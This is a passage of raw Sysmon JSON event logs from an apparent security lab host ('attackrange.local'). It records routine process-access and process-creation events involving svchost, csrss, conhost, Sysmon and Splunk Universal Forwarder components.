C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:50:50.914","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:50:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:50:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4078,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:50:50.914\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:50:50.914","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:50:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:50:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4079,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:50:50.914\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:50:50.914","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:50:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:50:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4080,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:50:50.914\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-00103F1E0500}\r\nSourceProcessId: 2768\r\nSourceThreadId: 2656\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-02BA-5F25-0000-0010890B0600}\r\nTargetProcessId: 4412\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:50:50.914","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-00103F1E0500}","SourceProcessId":"2768","SourceThreadId":"2656","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-02BA-5F25-0000-0010890B0600}","TargetProcessId":"4412","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:50:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:50:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4081,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:50:51.055\r\nSourceProcessGUID: {A837DB8D-02BA-5F25-0000-0010890B0600}\r\nSourceProcessId: 4412\r\nSourceThreadId: 644\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nTargetProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6025c5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6020f6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+59e67|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+5b88c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+8e7d70|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:50:51.055","SourceProcessGUID":"{A837DB8D-02BA-5F25-0000-0010890B0600}","SourceProcessId":"4412","SourceThreadId":"644","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","TargetProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","TargetProcessId":"2868","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6025c5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6020f6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+59e67|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+5b88c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+8e7d70|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:50:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:50:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":4082,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:50:51.587\r\nProcessGuid: {A837DB8D-02BB-5F25-0000-0010400D0600}\r\nProcessId: 3896\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nFileVersion: 8.0.2\r\nDescription: Network monitor\r\nProduct: Splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-netmon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC\r\nParentProcessGuid: {A837DB8D-0239-5F25-0000-001064190500}\r\nParentProcessId: 2868\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:50:51.587","ProcessGuid":"{A837DB8D-02BB-5F25-0000-0010400D0600}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","FileVersion":"8.0.2","Description":"Network monitor","Product":"Splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-netmon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC","ParentProcessGuid":"{A837DB8D-0239-5F25-0000-001064190500}","ParentProcessId":"2868","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 05:50:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:50:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4083,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:50:51.586\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nSourceProcessId: 2868\r\nSourceThreadId: 2168\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {A837DB8D-02BB-5F25-0000-0010400D0600}\r\nTargetProcessId: 3896\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:50:51.586","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","SourceProcessId":"2868","SourceThreadId":"2168","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{A837DB8D-02BB-5F25-0000-0010400D0600}","TargetProcessId":"3896","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:50:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:50:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4084,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:50:51.586\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-02BB-5F25-0000-0010400D0600}\r\nTargetProcessId: 3896\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:50:51.586","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-02BB-5F25-0000-0010400D0600}","TargetProcessId":"3896","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:50:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:50:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4085,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:50:51.586\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:50:51.586","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:50:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
